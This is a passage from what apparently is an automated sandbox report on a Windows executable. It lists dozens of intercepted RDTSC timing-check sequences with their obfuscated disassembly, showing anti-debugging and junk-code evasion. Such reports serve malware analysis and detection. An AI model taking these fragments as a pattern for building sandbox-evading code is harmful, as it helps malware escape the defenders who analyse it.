0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736AC0 second address: 736AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737AC2 second address: 737AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736CFA second address: 736CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736CFE second address: 736D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD3C4C26346h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738D2E second address: 738D60 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD3C4DD8D68h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FD3C4DD8D6Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD3C4DD8D78h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738D60 second address: 738D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73BE45 second address: 73BEBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4DD8D73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD3C4DD8D6Ch 0x0000000e popad 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+12477564h] 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D184Fh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FD3C4DD8D68h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a xor ebx, dword ptr [ebp+122D3AA4h] 0x00000040 jg 00007FD3C4DD8D67h 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FD3C4DD8D6Eh 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DF6F second address: 73DF8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26353h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E26 second address: 739ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD3C4DD8D6Dh 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007FD3C4DD8D76h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FD3C4DD8D68h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D18C6h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, dword ptr [ebp+122D24AFh] 0x00000045 mov bh, 76h 0x00000047 mov eax, dword ptr [ebp+122D1381h] 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FD3C4DD8D68h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 jmp 00007FD3C4DD8D70h 0x0000006c push FFFFFFFFh 0x0000006e mov ebx, eax 0x00000070 nop 0x00000071 jc 00007FD3C4DD8D78h 0x00000077 push eax 0x00000078 push edx 0x00000079 jne 00007FD3C4DD8D66h 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740123 second address: 740137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD3C4C2634Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740137 second address: 740141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD3C4DD8D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F287 second address: 73F28E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740141 second address: 740145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74110A second address: 74111A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007FD3C4C2634Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9635 second address: 6E963B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E963B second address: 6E963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E963F second address: 6E9643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FF71 second address: 74FFA8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C4C26346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FD3C4C26357h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3C4C2634Bh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FFA8 second address: 74FFAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75007B second address: 7500AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FD3C4C26346h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FD3C4C26354h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 jl 00007FD3C4C26348h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7500AF second address: 7500CE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3C4DD8D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d je 00007FD3C4DD8D6Ah 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756A0A second address: 756A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD3C4C26346h 0x0000000a jmp 00007FD3C4C2634Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756CD5 second address: 756CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756CDD second address: 756CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD3C4C26350h 0x0000000c jnl 00007FD3C4C26346h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756FB6 second address: 756FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4DD8D71h 0x00000007 jmp 00007FD3C4DD8D78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7572B0 second address: 7572B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C857 second address: 75C85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B607 second address: 75B623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26358h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C09F second address: 75C0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0A4 second address: 75C0A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0A9 second address: 75C0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD3C4DD8D66h 0x0000000a jmp 00007FD3C4DD8D75h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD3C4DD8D78h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0E7 second address: 75C10A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jnl 00007FD3C4C26346h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C10A second address: 75C110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C110 second address: 75C115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C572 second address: 75C577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C577 second address: 75C58F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3C4C2634Eh 0x00000008 jns 00007FD3C4C26346h 0x0000000e push esi 0x0000000f pop esi 0x00000010 jc 00007FD3C4C2634Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7622FB second address: 762303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762303 second address: 762309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762309 second address: 76231A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FD3C4DD8D66h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76231A second address: 762345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jmp 00007FD3C4C2634Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD3C4C26353h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762345 second address: 762349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76127E second address: 76129B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3C4C26346h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007FD3C4C2634Fh 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76129B second address: 7612A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD3C4DD8D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7612A5 second address: 7612AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76154F second address: 761553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761553 second address: 7615A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FD3C4C26346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FD3C4C2634Ch 0x00000012 jmp 00007FD3C4C26355h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3C4C26353h 0x0000001f jmp 00007FD3C4C2634Fh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7615A5 second address: 7615AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7616F5 second address: 7616F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7616F9 second address: 761712 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3C4DD8D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FD3C4DD8D66h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761977 second address: 761998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD3C4C26350h 0x0000000d jne 00007FD3C4C26346h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761AD1 second address: 761AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761AD7 second address: 761B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FD3C4C26346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e jmp 00007FD3C4C26352h 0x00000013 jmp 00007FD3C4C26352h 0x00000018 jmp 00007FD3C4C26357h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761B25 second address: 761B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C4DD8D74h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761B3D second address: 761B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761C8B second address: 761C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7620F3 second address: 7620F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7620F7 second address: 762114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224499h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762114 second address: 762123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007FD3C500B9D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762123 second address: 762156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jns 00007FD3C522449Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FD3C522448Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762156 second address: 762196 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3C500B9D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD3C500B9DCh 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007FD3C500B9D6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FD3C500B9E9h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7609C9 second address: 7609F4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C52244A5h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7609F4 second address: 7609F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7609F8 second address: 760A08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760A08 second address: 760A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FD3C500B9E3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760A25 second address: 760A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD3C5224494h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760A3F second address: 760A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7653C5 second address: 7653C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7653C9 second address: 7653CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7653CD second address: 765406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3C5224491h 0x0000000b popad 0x0000000c jo 00007FD3C52244A6h 0x00000012 jmp 00007FD3C5224496h 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2B24 second address: 6E2B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2B38 second address: 6E2B45 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3C5224486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2B45 second address: 6E2B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FD3C500B9D6h 0x0000000c popad 0x0000000d pop esi 0x0000000e jc 00007FD3C500B9E8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FD3C500B9D6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769BC1 second address: 769BCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769BCA second address: 769C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007FD3C500B9EEh 0x0000000e jmp 00007FD3C500B9E6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FD3C500B9DAh 0x0000001a jmp 00007FD3C500B9DCh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD3C500B9E8h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7688D6 second address: 7688F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FD3C5224494h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FA8D second address: 72FA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD3C500B9D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FA97 second address: 70F239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224493h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FD3C5224488h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push eax 0x00000029 mov dh, 51h 0x0000002b pop edi 0x0000002c call dword ptr [ebp+122D1D22h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FD3C5224490h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73002A second address: 730034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730034 second address: 730038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301BE second address: 7301C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301C4 second address: 7301C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301C8 second address: 7301DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FD3C500B9E2h 0x0000000f jbe 00007FD3C500B9DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301DF second address: 730215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 xchg eax, esi 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FD3C5224488h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 00000014h 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f add edi, 5BC1C840h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD3C522448Ah 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730215 second address: 73021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73021B second address: 730232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD3C5224492h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730A65 second address: 730A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
